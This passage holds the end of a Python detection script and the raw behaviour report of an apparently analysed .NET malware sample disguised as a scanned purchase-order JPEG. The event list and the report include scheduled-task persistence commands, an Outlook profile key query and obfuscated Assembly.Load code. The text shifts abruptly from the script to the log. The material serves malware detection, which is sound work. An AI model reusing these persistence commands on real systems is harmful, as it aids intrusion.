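    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp"'),
    (r"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe",
     r'"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe"'),
    ("unknown",
     r"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"),
    (r"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HJnkiZjAPsec" '
     r'/XML "C:\Users\user\AppData\Local\Temp\tmpCB45.tmp"'),
    (r"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe",
     r'"C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe"'),
]


@dataclass
class Finding:
    rule: str      # hypothetical rule name chosen for this example
    parent: str
    child: str
    detail: str


# First token of a command line, quoted or bare.
_FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))')
# Argument values, quoted or bare, for the three switches we care about.
_EXCLUSION = re.compile(r'-ExclusionPath\s+(?:"([^"]+)"|(\S+))', re.I)
_TASK_NAME = re.compile(r'/TN\s+(?:"([^"]+)"|(\S+))', re.I)
_TASK_XML = re.compile(r'/XML\s+(?:"([^"]+)"|(\S+))', re.I)
_TEMP_DIR = re.compile(r'\\AppData\\Local\\Temp\\', re.I)
_USER_PROFILE = re.compile(r'^[A-Za-z]:\\Users\\', re.I)


def image_from_cmdline(cmdline: str) -> str:
    """Return the executable path at the start of a command line."""
    m = _FIRST_TOKEN.match(cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def _arg(pattern: re.Pattern, cmdline: str):
    m = pattern.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def analyze(events):
    """Apply the three chain checks to (parent image, child command line) events."""
    findings = []
    for parent, cmdline in events:
        child = image_from_cmdline(cmdline)
        base = child.rsplit("\\", 1)[-1].lower()

        # 1. Defender exclusion added from PowerShell; a path under the user
        #    profile is the suspicious case (malware protecting its own drop).
        if base == "powershell.exe" and re.search(r"Add-MpPreference", cmdline, re.I):
            path = _arg(_EXCLUSION, cmdline)
            if path:
                scope = "user-writable" if _USER_PROFILE.match(path) else "system"
                findings.append(Finding("defender_exclusion", parent, child,
                                        f"{path} ({scope})"))

        # 2. Scheduled task registered from an XML definition in the Temp dir.
        if base == "schtasks.exe" and re.search(r"/Create\b", cmdline, re.I):
            xml = _arg(_TASK_XML, cmdline)
            name = _arg(_TASK_NAME, cmdline) or "?"
            if xml and _TEMP_DIR.search(xml):
                findings.append(Finding("schtasks_xml_from_temp", parent, child,
                                        f"task {name} from {xml}"))

        # 3. Parent spawned a copy of its own image (typical injection target).
        if child and parent.lower() == child.lower():
            findings.append(Finding("self_relaunch", parent, child,
                                    "parent spawned a copy of its own image"))
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"{f.rule:24} {f.parent} -> {f.child}: {f.detail}")
```

Run as a script it prints five findings: one Defender exclusion, two task registrations from Temp and two self-relaunches. To use it outside the sandbox, feed Sysmon Event ID 1 or EDR process events in the same (parent image, command line) shape. The self-relaunch check is noisy on its own (updaters and browsers spawn copies of themselves), so it is meant to be scored together with the other two rules rather than alerted on alone.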
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.41d0b90.2.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.4c6df10.0.raw.unpack, Gh561AECFfZnyUrvtJ.cs | .Net Code: Eei3vKKCp3YTRj3t1Js System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.c120000.6.raw.unpack, Gh561AECFfZnyUrvtJ.cs | .Net Code: Eei3vKKCp3YTRj3t1Js System.Reflection.Assembly.Load(byte[])
